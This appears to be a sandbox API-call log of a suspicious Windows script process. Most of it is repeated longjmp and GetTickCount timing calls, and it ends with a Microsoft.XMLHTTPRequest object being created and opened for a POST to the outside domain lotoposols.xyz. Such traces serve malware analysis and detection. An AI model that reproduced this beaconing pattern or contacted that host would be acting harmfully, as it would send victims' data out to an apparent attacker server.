	[0109.746] longjmp () 
	[0109.746] longjmp () 
	[0109.746] longjmp () 
	[0109.746] longjmp () 
	[0109.746] longjmp () 
	[0109.747] longjmp () 
	[0109.747] longjmp () 
	[0109.747] longjmp () 
	[0109.748] longjmp () 
	[0109.748] longjmp () 
	[0109.749] longjmp () 
	[0109.749] longjmp () 
	[0109.749] longjmp () 
	[0109.749] longjmp () 
	[0109.749] longjmp () 
	[0109.749] longjmp () 
	[0109.750] longjmp () 
	[0109.750] longjmp () 
	[0109.750] longjmp () 
	[0109.750] longjmp () 
	[0109.750] longjmp () 
	[0109.750] longjmp () 
	[0109.751] longjmp () 
	[0109.751] longjmp () 
	[0109.751] longjmp () 
	[0109.751] longjmp () 
	[0109.751] longjmp () 
	[0109.751] longjmp () 
	[0109.752] longjmp () 
	[0109.752] longjmp () 
	[0109.752] longjmp () 
	[0109.752] longjmp () 
	[0109.753] GetTickCount () returned 0x1152981
	[0109.753] longjmp () 
	[0109.753] longjmp () 
	[0109.753] longjmp () 
	[0109.753] longjmp () 
	[0109.753] longjmp () 
	[0109.754] longjmp () 
	[0109.754] longjmp () 
	[0109.754] longjmp () 
	[0109.754] longjmp () 
	[0109.754] longjmp () 
	[0109.755] longjmp () 
	[0109.755] longjmp () 
	[0109.755] longjmp () 
	[0109.755] longjmp () 
	[0109.755] longjmp () 
	[0109.755] longjmp () 
	[0109.756] longjmp () 
	[0109.756] longjmp () 
	[0109.756] longjmp () 
	[0109.756] longjmp () 
	[0109.757] longjmp () 
	[0109.757] longjmp () 
	[0109.757] longjmp () 
	[0109.757] longjmp () 
	[0109.757] longjmp () 
	[0109.758] longjmp () 
	[0109.758] longjmp () 
	[0109.758] longjmp () 
	[0109.758] longjmp () 
	[0109.758] longjmp () 
	[0109.759] longjmp () 
	[0109.759] longjmp () 
	[0109.759] GetTickCount () returned 0x1152981
	[0109.759] longjmp () 
	[0109.759] longjmp () 
	[0109.759] longjmp () 
	[0109.760] longjmp () 
	[0109.760] longjmp () 
	[0109.760] longjmp () 
	[0109.760] longjmp () 
	[0109.760] longjmp () 
	[0109.761] longjmp () 
	[0109.761] longjmp () 
	[0109.761] longjmp () 
	[0109.761] longjmp () 
	[0109.761] longjmp () 
	[0109.762] longjmp () 
	[0109.762] longjmp () 
	[0109.762] longjmp () 
	[0109.762] longjmp () 
	[0109.763] longjmp () 
	[0109.763] longjmp () 
	[0109.763] longjmp () 
	[0109.763] longjmp () 
	[0109.763] longjmp () 
	[0109.764] longjmp () 
	[0109.764] longjmp () 
	[0109.764] longjmp () 
	[0109.764] longjmp () 
	[0109.764] longjmp () 
	[0109.765] longjmp () 
	[0109.765] longjmp () 
	[0109.765] longjmp () 
	[0109.765] longjmp () 
	[0109.765] longjmp () 
	[0109.766] GetTickCount () returned 0x1152991
	[0109.766] longjmp () 
	[0109.766] longjmp () 
	[0109.766] longjmp () 
	[0109.766] longjmp () 
	[0109.766] longjmp () 
	[0109.767] longjmp () 
	[0109.767] longjmp () 
	[0109.767] longjmp () 
	[0109.767] longjmp () 
	[0109.767] longjmp () 
	[0109.768] longjmp () 
	[0109.768] longjmp () 
	[0109.768] longjmp () 
	[0109.768] longjmp () 
	[0109.768] longjmp () 
	[0109.768] longjmp () 
	[0109.769] longjmp () 
	[0109.769] longjmp () 
	[0109.769] longjmp () 
	[0109.769] longjmp () 
	[0109.769] longjmp () 
	[0109.769] longjmp () 
	[0109.770] longjmp () 
	[0109.770] longjmp () 
	[0109.770] longjmp () 
	[0109.770] longjmp () 
	[0109.770] longjmp () 
	[0109.770] longjmp () 
	[0109.770] longjmp () 
	[0109.771] longjmp () 
	[0109.771] longjmp () 
	[0109.771] longjmp () 
	[0109.771] GetTickCount () returned 0x1152991
	[0109.771] longjmp () 
	[0109.771] longjmp () 
	[0109.772] longjmp () 
	[0109.772] longjmp () 
	[0109.772] longjmp () 
	[0109.772] longjmp () 
	[0109.772] longjmp () 
	[0109.773] longjmp () 
	[0109.773] longjmp () 
	[0109.773] longjmp () 
	[0109.773] longjmp () 
	[0109.773] longjmp () 
	[0109.774] longjmp () 
	[0109.774] longjmp () 
	[0109.774] longjmp () 
	[0109.774] longjmp () 
	[0109.774] longjmp () 
	[0109.775] longjmp () 
	[0109.775] longjmp () 
	[0109.775] longjmp () 
	[0109.775] longjmp () 
	[0109.775] longjmp () 
	[0109.775] longjmp () 
	[0109.776] longjmp () 
	[0109.776] longjmp () 
	[0109.776] longjmp () 
	[0109.776] longjmp () 
	[0109.776] longjmp () 
	[0109.776] longjmp () 
	[0109.777] longjmp () 
	[0109.777] longjmp () 
	[0109.777] longjmp () 
	[0109.777] GetTickCount () returned 0x1152991
	[0109.777] longjmp () 
	[0109.777] longjmp () 
	[0109.778] longjmp () 
	[0109.778] longjmp () 
	[0109.778] longjmp () 
	[0109.778] longjmp () 
	[0109.778] longjmp () 
	[0109.779] longjmp () 
	[0109.779] longjmp () 
	[0109.779] longjmp () 
	[0109.779] longjmp () 
	[0109.779] longjmp () 
	[0109.780] longjmp () 
	[0109.780] longjmp () 
	[0109.780] longjmp () 
	[0109.780] longjmp () 
	[0109.780] longjmp () 
	[0109.781] longjmp () 
	[0109.781] longjmp () 
	[0109.781] longjmp () 
	[0109.781] longjmp () 
	[0109.781] longjmp () 
	[0109.782] longjmp () 
	[0109.782] longjmp () 
	[0109.782] longjmp () 
	[0109.782] longjmp () 
	[0109.782] longjmp () 
	[0109.782] longjmp () 
	[0109.783] longjmp () 
	[0109.783] longjmp () 
	[0109.783] longjmp () 
	[0109.783] longjmp () 
	[0109.783] GetTickCount () returned 0x11529a0
	[0109.783] longjmp () 
	[0109.783] longjmp () 
	[0109.783] longjmp () 
	[0109.784] longjmp () 
	[0109.784] longjmp () 
	[0109.784] longjmp () 
	[0109.784] longjmp () 
	[0109.784] longjmp () 
	[0109.785] longjmp () 
	[0109.785] longjmp () 
	[0109.785] longjmp () 
	[0109.785] longjmp () 
	[0109.785] longjmp () 
	[0109.785] longjmp () 
	[0109.785] longjmp () 
	[0109.786] longjmp () 
	[0109.786] longjmp () 
	[0109.786] longjmp () 
	[0109.786] longjmp () 
	[0109.786] longjmp () 
	[0109.787] longjmp () 
	[0109.787] longjmp () 
	[0109.787] longjmp () 
	[0109.787] longjmp () 
	[0109.787] longjmp () 
	[0109.788] longjmp () 
	[0109.788] longjmp () 
	[0109.788] longjmp () 
	[0109.788] longjmp () 
	[0109.788] longjmp () 
	[0109.788] longjmp () 
	[0109.789] longjmp () 
	[0109.789] GetTickCount () returned 0x11529a0
	[0109.789] longjmp () 
	[0109.789] longjmp () 
	[0109.789] longjmp () 
	[0109.789] longjmp () 
	[0109.790] longjmp () 
	[0109.790] longjmp () 
	[0109.790] longjmp () 
	[0109.790] longjmp () 
	[0109.790] longjmp () 
	[0109.791] longjmp () 
	[0109.791] longjmp () 
	[0109.791] longjmp () 
	[0109.791] longjmp () 
	[0109.791] longjmp () 
	[0109.792] longjmp () 
	[0109.792] longjmp () 
	[0109.792] longjmp () 
	[0109.792] longjmp () 
	[0109.792] longjmp () 
	[0109.793] longjmp () 
	[0109.793] longjmp () 
	[0109.793] longjmp () 
	[0109.793] longjmp () 
	[0109.794] longjmp () 
	[0109.794] longjmp () 
	[0109.794] longjmp () 
	[0109.794] longjmp () 
	[0109.794] longjmp () 
	[0109.795] longjmp () 
	[0109.795] longjmp () 
	[0109.795] longjmp () 
	[0109.795] longjmp () 
	[0109.796] GetTickCount () returned 0x11529b0
	[0109.796] longjmp () 
	[0109.796] longjmp () 
	[0109.796] longjmp () 
	[0109.796] longjmp () 
	[0109.796] longjmp () 
	[0109.797] longjmp () 
	[0109.797] longjmp () 
	[0109.797] longjmp () 
	[0109.797] longjmp () 
	[0109.797] longjmp () 
	[0109.797] longjmp () 
	[0109.798] longjmp () 
	[0109.798] longjmp () 
	[0109.798] longjmp () 
	[0109.798] longjmp () 
	[0109.798] longjmp () 
	[0109.798] longjmp () 
	[0109.799] longjmp () 
	[0109.799] longjmp () 
	[0109.799] longjmp () 
	[0109.799] longjmp () 
	[0109.799] longjmp () 
	[0109.799] longjmp () 
	[0109.799] longjmp () 
	[0109.800] longjmp () 
	[0109.800] longjmp () 
	[0109.800] longjmp () 
	[0109.800] longjmp () 
	[0109.800] longjmp () 
	[0109.800] longjmp () 
	[0109.801] longjmp () 
	[0109.801] longjmp () 
	[0109.801] GetTickCount () returned 0x11529b0
	[0109.801] longjmp () 
	[0109.801] longjmp () 
	[0109.801] longjmp () 
	[0109.802] longjmp () 
	[0109.802] longjmp () 
	[0109.802] longjmp () 
	[0109.802] longjmp () 
	[0109.802] longjmp () 
	[0109.803] longjmp () 
	[0109.803] longjmp () 
	[0109.803] longjmp () 
	[0109.803] longjmp () 
	[0109.803] longjmp () 
	[0109.803] longjmp () 
	[0109.804] longjmp () 
	[0109.804] longjmp () 
	[0109.804] longjmp () 
	[0109.804] longjmp () 
	[0109.804] longjmp () 
	[0109.805] longjmp () 
	[0109.805] longjmp () 
	[0109.805] longjmp () 
	[0109.805] longjmp () 
	[0109.805] longjmp () 
	[0109.806] longjmp () 
	[0109.806] longjmp () 
	[0109.806] longjmp () 
	[0109.806] longjmp () 
	[0109.806] longjmp () 
	[0109.807] longjmp () 
	[0109.807] longjmp () 
	[0109.807] longjmp () 
	[0109.807] GetTickCount () returned 0x11529b0
	[0109.807] longjmp () 
	[0109.807] longjmp () 
	[0109.807] longjmp () 
	[0109.808] longjmp () 
	[0109.808] longjmp () 
	[0109.808] longjmp () 
	[0109.808] longjmp () 
	[0109.808] longjmp () 
	[0109.809] longjmp () 
	[0109.809] longjmp () 
	[0109.809] longjmp () 
	[0109.809] longjmp () 
	[0109.810] longjmp () 
	[0109.810] longjmp () 
	[0109.810] longjmp () 
	[0109.810] longjmp () 
	[0109.810] longjmp () 
	[0109.810] longjmp () 
	[0109.811] longjmp () 
	[0109.811] longjmp () 
	[0109.811] longjmp () 
	[0109.811] longjmp () 
	[0109.811] longjmp () 
	[0109.812] longjmp () 
	[0109.812] longjmp () 
	[0109.812] longjmp () 
	[0109.812] longjmp () 
	[0109.812] longjmp () 
	[0109.813] longjmp () 
	[0109.813] longjmp () 
	[0109.813] longjmp () 
	[0109.813] longjmp () 
	[0109.813] GetTickCount () returned 0x11529bf
	[0109.813] longjmp () 
	[0109.814] longjmp () 
	[0109.814] longjmp () 
	[0109.814] longjmp () 
	[0109.816] longjmp () 
	[0109.816] longjmp () 
	[0109.816] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0109.816] SysStringLen (param_1=0x0) returned 0x0
	[0109.816] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0109.817] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0109.817] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0109.817] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0109.817] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0109.817] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0109.817] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0109.818] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0109.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0109.819] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0109.819] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0109.819] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0109.819] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0109.819] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0109.819] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0109.819] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0109.819] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0109.819] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0109.819] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0109.819] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0109.819] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0109.819] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0109.819] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0109.820] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0109.820] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0109.820] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0109.823] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0109.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0109.823] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0109.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0109.824] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0109.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0109.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0109.824] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
